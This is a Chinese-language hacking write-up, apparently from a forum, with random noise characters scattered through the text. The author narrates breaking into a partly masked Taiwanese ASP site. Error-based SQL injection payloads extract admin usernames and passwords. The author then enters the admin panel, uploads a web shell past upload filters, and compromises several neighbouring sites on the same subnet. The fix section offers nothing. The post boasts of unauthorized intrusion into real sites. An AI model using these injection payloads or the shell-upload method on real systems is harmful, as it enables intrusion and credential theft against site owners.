发现一个注入点
: ~: h9 M* ?# u% h" Zhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
$ b( V. d$ Q7 B1 Q k9 e/ b' }; I9 i5 |# H5 H
习惯性的加’having1=1--" x% z! s; Z2 m% k
' o p' k' R; G5 r. V! k" Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
' J: Z2 K- q6 H
2 h! h) G, t) V T3 l0
0 o: ]: V; ]; {2 W2 K
6 Q5 y. |1 q+ d) p0 j# p爆出Diary_A.dl_Title(这时候很激动啊)) J1 D5 v% E1 ~% {1 E' ~- `, g$ M
[0 t+ x3 Q: g3 f1 I5 H! m那么继续
1 @& x+ V @$ b( ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—8 _9 y- t8 p; [. X
- V7 j( t, t6 t% O/ A继续,一直爆下去
) _! I! p3 Q3 w% O1 y* @" @) }0 n" T7 F$ B
爆到几个字段和表段 但是没找到需要的管理用户的字段
2 q- g! X; E# Y; B) A* @- E( g: }8 [1 a% m
蛋疼了 怎么办 然后去后台登陆页看源码# d$ u" V: S# V0 D w
: D7 h E5 u/ I2 I2 V
0% s m0 \7 b w* l K2 S. [. x/ M" L
8 q3 ?2 Q* {5 ?! c2 }! A0 w
Input name= “ADUID”
2 `* i: L- g0 I$ d; SInput name= “ADPWD”6 c+ p7 ^: _* N9 L
2 C, _+ g s5 |" z
很幸运 找到了字段那就继续! Y7 L( Z* Z' y3 H
找到之后开始爆用户% F0 O) j7 S( g9 }5 Y1 E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—/ Z6 ?+ \3 a, x! a5 a7 T# m
爆密码
. S7 C$ @+ ]$ I" I( ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—9 \) a7 M8 g, F$ i, B! G
测试了下 这个注入点只能爆到文章哪里的表
- y% U* `" J$ y1 e- L3 w+ b4 ]) M+ t
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
, i7 c+ R' W) Q7 R9 w
+ S( a$ {- h6 y5 w7 s4 f又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
- R+ A w1 o* J' R$ p7 g# b9 v( |! Q/ u, D
473, v, \! t, d% [0 P0 Y1 \
; C- E; Y- i+ Q& v& q0 {% |进后台
( L O$ R& g% j1 Z, g( v" H/ y9 O, x- F6 Q- B) R
. p/ W+ {' R" m- n, l' w
发现几个上传点 有的地方不能上传 而且防止恶意代码8 Q" h/ W2 i( F) N! D
+ [& K, x5 r) _
没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 D/ b8 A0 p; R" R" K8 g
8 D3 z5 |+ H& U" ~3 O9 _* ~. Z: M1 l3 D
在系统管理那里直接上传 不过没有显示地址
; L8 N- |" w. ~/ [# b# v$ \$ L P% Z* f7 z, k* a4 X; Q) k! ^ R4 S
再上传一次 抓包 搞定OK8 ~# _6 b ]( m) b" G
' L+ A# z8 O: X$ {
1 k9 c3 G d8 X* ?: H
( T. o' n& [+ Y3 K& _" T472
" b; i* n. Q6 ^. H8 l
. b# ^5 v+ n% K p# F. V晚上不行了 去睡觉。。。
) ?& V* ?5 x2 `7 W$ X( n2 G第二天刚起床 闲的没事做继续日站吧
, i/ Q9 W- x" I: L& S- N) q4 p) N9 z! x! C$ m5 j
找个站 就把这个站的旁c扫了下- a r4 F- v* f7 |$ D
/ S& X7 [- h2 V( P; u+ j发现c段也有一个购物站 ,然后还和这个站的模板差不多7 ?! ?- T$ y: z( M
% ? ?0 O9 O/ V$ k& S
就找到会员登录口测试
( Q: W5 i! m& W6 Z+ \ W7 O! v3 ~' O7 @" z# } v
'and (select top 1 MGR_UID from A_MGR)>0—
7 l% t4 Z9 K3 Z9 X果断爆到了 这时候我很激动 通杀
* u0 I% j0 d0 U1 x& I) Q4 {( k( n/ E a
再次翻c段
# v+ o% ?6 Z" J" A6 T9 L9 T% S, ?$ u G
翻出几个站 都成功拿下4 B0 r0 Z. X; Q) I2 G5 E4 V5 e# `
8 m( q4 X( E' l( j
. p0 J9 z/ K6 f, t6 N
, O' y6 X. }' K
修复方案:. e" b6 L8 a& I1 J7 }6 O
他们比我专业 ; H- E9 \- f) Q4 B/ I
+ x! r9 X0 E8 m. B8 i. l0 W3 e5 q Z
8 L; w, S6 U. e% ~. t
|